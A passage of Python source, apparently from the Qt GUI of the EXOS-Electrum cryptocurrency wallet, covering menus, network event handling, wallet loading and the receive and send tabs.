# to prevent GC from getting in our way.
def on_version_received(v):
if UpdateCheck.is_newer(v):
self.update_check_button.setText(_("Update to EXOS-Electrum {} is available").format(v))
self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
self.update_check_button.show()
self._update_check_thread = UpdateCheckThread(self)
self._update_check_thread.checked.connect(on_version_received)
self._update_check_thread.start()
def on_history(self, b):
self.wallet.clear_coin_price_cache()
self.new_fx_history_signal.emit()
def setup_exception_hook(self):
Exception_Hook(self)
def on_fx_history(self):
self.history_model.refresh('fx_history')
self.address_list.update()
def on_quotes(self, b):
self.new_fx_quotes_signal.emit()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_model.refresh('fx_quotes')
self.address_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
#return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name())
return self.wallet.diagnostic_name()
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
e = exc_info[1]
if isinstance(e, UserCancelled):
pass
elif isinstance(e, UserFacingException):
self.show_error(str(e))
else:
try:
self.logger.error("on_error", exc_info=exc_info)
except OSError:
pass # see #4418
self.show_error(str(e))
def on_network(self, event, *args):
if event == 'wallet_updated':
wallet = args[0]
if wallet == self.wallet:
self.need_update.set()
elif event == 'network_updated':
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
self.network_signal.emit('status', None)
elif event == 'blockchain_updated':
# to update number of confirmations in history
self.need_update.set()
elif event == 'new_transaction':
wallet, tx = args
if wallet == self.wallet:
self.tx_notification_queue.put(tx)
elif event in ['status', 'banner', 'verified', 'fee', 'fee_histogram']:
# Handle in GUI thread
self.network_signal.emit(event, args)
else:
self.logger.info(f"unexpected network message: {event} {args}")
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
if event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
wallet, tx_hash, tx_mined_status = args
if wallet == self.wallet:
self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
elif event == 'fee':
if self.config.is_dynfee():
self.fee_slider.update()
self.require_fee_update = True
elif event == 'fee_histogram':
if self.config.is_dynfee():
self.fee_slider.update()
self.require_fee_update = True
self.history_model.on_fee_histogram()
else:
self.logger.info(f"unexpected network_qt signal: {event} {args}")
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.logger.info(f'close_wallet {self.wallet.storage.path}')
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.update_recently_visited(wallet.storage.path)
self.need_update.set()
# Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.logger.info("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "EXOS-Electrum Testnet" if constants.net.TESTNET else "EXOS-Electrum"
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend EXOS with it."),
_("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Watch-only wallet'))
def warn_if_testnet(self):
if not constants.net.TESTNET:
return
# user might have opted out already
if self.config.get('dont_show_testnet_warning', False):
return
# only show once per process lifecycle
if getattr(self.gui_object, '_warned_testnet', False):
return
self.gui_object._warned_testnet = True
msg = ''.join([
_("You are in testnet mode."), ' ',
_("Testnet coins are worthless."), '\n',
_("Testnet is separate from the main EXOS network. It is used for testing.")
])
cb = QCheckBox(_("Don't show this again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
self.show_warning(msg, title=_('Testnet'), checkbox=cb)
if cb_checked:
self.config.set_key('dont_show_testnet_warning', True)
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
shutil.copy2(path, new_path)
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except BaseException as reason:
self.show_critical(_("EXOS-Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.config.get_wallet_path()))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_master_public_keys)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.contact_list.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.invoice_list.export_invoices())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools"))
# Settings / Preferences are all reserved keywords in macOS using this as work around
tools_menu.addAction(_("EXOS-Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Check for updates"), self.show_update_check)
help_menu.addAction(_("&Official website"), lambda: webopen("https://economy.openexo.com"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webopen("https://economy.openexo.com/docs")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters().host
self.pay_to_URI('exos:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "EXOS-Electrum",
(_("Version")+" %s" % ELECTRUM_BUILD + "\n\n" +
_("EXOS-Electrum's focus is speed, with low resource usage and simplicity.") + " " +
_("You do not need to perform regular backups, because your wallet can be "
"recovered from a secret phrase that you can memorize or write on paper.") + " " +
_("Startup times are fast because it operates in conjunction with high-performance "
"servers that handle the many complicated parts of the EXOS system.") + "\n\n" +
_("This software uses icons from the Icons8 icon pack (icons8.com).")))
def show_update_check(self, version=None):
self.gui_object._update_check = UpdateCheck(self, version)
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
"<a href=\"https://github.com/exoeconomy/exos-electrum/issues\">https://github.com/exoeconomy/EXOS-electrum/issues</a><br/><br/>",
_("Before reporting a bug, please upgrade to the most recent version of EXOS-Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs. The more detail you provide, the better the team will be able to help.")
])
self.show_message(msg, title="EXOS-Electrum - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
if self.tx_notification_queue.qsize() == 0:
return
if not self.wallet.up_to_date:
return # no notifications while syncing
now = time.time()
rate_limit = 20 # seconds
if self.tx_notification_last_time + rate_limit > now:
return
self.tx_notification_last_time = now
self.logger.info("Notifying GUI about new transactions")
txns = []
while True:
try:
txns.append(self.tx_notification_queue.get_nowait())
except queue.Empty:
break
# Combine the transactions if there are at least three
if len(txns) >= 3:
total_amount = 0
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
total_amount += v
self.notify(_("{} new transactions: Total amount received in the new transactions {}")
.format(len(txns), self.format_amount_and_units(total_amount)))
else:
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
self.notify(_("New transaction: {}").format(self.format_amount_and_units(v)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("EXOS-Electrum", message, read_QIcon("electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("EXOS-Electrum", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join( directory, filename )
fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def timer_actions(self):
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
elif not self.wallet.up_to_date:
# this updates "synchronizing" progress
self.update_status()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
self.notify_transactions()
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, self.num_zeros, self.decimal_point, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount) if self.fx else None
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
# fee_rate is in exo/kB
return format_fee_satoshis(fee_rate/1000, num_zeros=self.num_zeros) + ' exo/byte'
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
return decimal_point_to_base_unit_name(self.decimal_point)
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None:
text = _("Offline")
icon = read_QIcon("status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
text = ("{} ({}/{})"
.format(_("Synchronizing..."), num_answered, num_sent))
icon = read_QIcon("status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = read_QIcon("status_lagging%s.png"%fork_str)
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = read_QIcon("status_connected%s.png"%fork_str)
else:
icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
else:
if self.network.proxy:
text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
else:
text = _("Not connected")
icon = read_QIcon("status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self, wallet=None):
if wallet is None:
wallet = self.wallet
if wallet != self.wallet:
return
self.history_model.refresh('update_tabs')
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_completions()
def create_history_tab(self):
self.history_model = HistoryModel(self)
self.history_list = l = HistoryList(self, self.history_model)
self.history_model.set_view(self.history_list)
l.searchable_list = l
toolbar = l.create_toolbar(self.config)
toolbar_shown = self.config.get('show_toolbar_history', False)
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_address_e = ButtonsLineEdit()
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
msg = _('EXOS address where the payment should be received. Note that each payment request uses a different EXOS address.')
self.receive_address_label = HelpLabel(_('Receiving address'), msg)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.receive_address_e.textChanged.connect(self.update_receive_address_styling)
self.receive_address_e.setFocusPolicy(Qt.ClickFocus)
grid.addWidget(self.receive_address_label, 0, 0)
grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 1, 0)
grid.addWidget(self.receive_message_e, 1, 1, 1, -1)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 2, 0)
grid.addWidget(self.receive_amount_e, 2, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 2, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.expires_combo = QComboBox()
self.expires_combo.addItems([i[0] for i in expiration_values])
self.expires_combo.setCurrentIndex(3)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding EXOS addresses.'),
_('The EXOS address never expires and will always be part of this EXOS-Electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0)
grid.addWidget(self.expires_combo, 3, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 3, 1)
self.save_request_button = QPushButton(_('Save'))
self.save_request_button.clicked.connect(self.save_payment_request)
self.new_request_button = QPushButton(_('New'))
self.new_request_button.clicked.connect(self.new_payment_request)
self.receive_qr = QRCodeWidget(fixedSize=200)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.save_request_button)
buttons.addWidget(self.new_request_button)
grid.addLayout(buttons, 4, 1, 1, 2)
self.receive_requests_label = QLabel(_('Requests'))
from .request_list import RequestList
self.request_list = RequestList(self)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addWidget(self.receive_qr)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_payment_request(self, addr):
self.wallet.remove_payment_request(addr, self.config)
self.request_list.update()
self.clear_receive_tab()
def get_request_URI(self, addr):
req = self.wallet.receive_requests[addr]
message = self.wallet.labels.get(addr, '')
amount = req['amount']
extra_query_params = {}
if req.get('time'):
extra_query_params['time'] = str(int(req.get('time')))
if req.get('exp'):
extra_query_params['exp'] = str(int(req.get('exp')))
if req.get('name') and req.get('sig'):
sig = bfh(req.get('sig'))
sig = bitcoin.base_encode(sig, base=58)
extra_query_params['name'] = req['name']
extra_query_params['sig'] = sig
uri = util.create_bip21_uri(addr, amount, message, extra_query_params=extra_query_params)
return str(uri)
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(str(e))
return
else:
return
def save_payment_request(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
if not message and not amount:
self.show_error(_('No message or amount'))
return False
i = self.expires_combo.currentIndex()
expiration = list(map(lambda x: x[1], expiration_values))[i]
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req, self.config)
except Exception as e:
self.logger.exception('Error adding payment request')
self.show_error(_('Error adding payment request') + ':\n' + str(e))
else:
self.sign_payment_request(addr)
self.save_request_button.setEnabled(False)
finally:
self.request_list.update()
self.address_list.update()
def view_and_paste(self, title, msg, data):
dialog = WindowModalDialog(self, title)
vbox = QVBoxLayout()
label = QLabel(msg)
label.setWordWrap(True)
vbox.addWidget(label)
pr_e = ShowQRTextEdit(text=data)
vbox.addWidget(pr_e)
vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def export_payment_request(self, addr):
r = self.wallet.receive_requests.get(addr)
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(util.to_bytes(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def new_payment_request(self):
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet that cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
return
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
self.set_receive_address(addr)
self.expires_label.hide()
self.expires_combo.show()
self.new_request_button.setEnabled(False)
self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
def clear_receive_tab(self):
try:
addr = self.wallet.get_receiving_address() or ''
except InternalAddressCorruption as e:
self.show_error(str(e))
addr = ''
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
if not bitcoin.is_address(addr):
return
self.show_receive_tab()
self.receive_address_e.setText(addr)
self.new_request_button.setEnabled(True)
def update_receive_qr(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
self.save_request_button.setEnabled((amount is not None) or (message != ""))
uri = util.create_bip21_uri(addr, amount, message)
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.qrw.setData(uri)
def update_receive_address_styling(self):
addr = str(self.receive_address_e.text())
if self.wallet.is_used(addr):
self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
self.receive_address_e.setToolTip(_("This address has already been used. "
"For better privacy, do not reuse it for new payments."))
else:
self.receive_address_e.setStyleSheet("")
self.receive_address_e.setToolTip("")
def set_feerounding_text(self, num_satoshis_added):
self.feerounding_text = (_('Additional {} exos are going to be added.')
.format(num_satoshis_added))
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a EXOS address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a EXOS address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
grid.addWidget(self.message_e, 2, 1, 1, -1)
self.from_label = QLabel(_('From'))
grid.addWidget(self.from_label, 3, 0)
self.from_list = FromList(self, self.from_list_menu)
grid.addWidget(self.from_list, 3, 1, 1, -1)
self.set_pay_from([])
msg = _('Amount to be sent.') + '\n\n' \
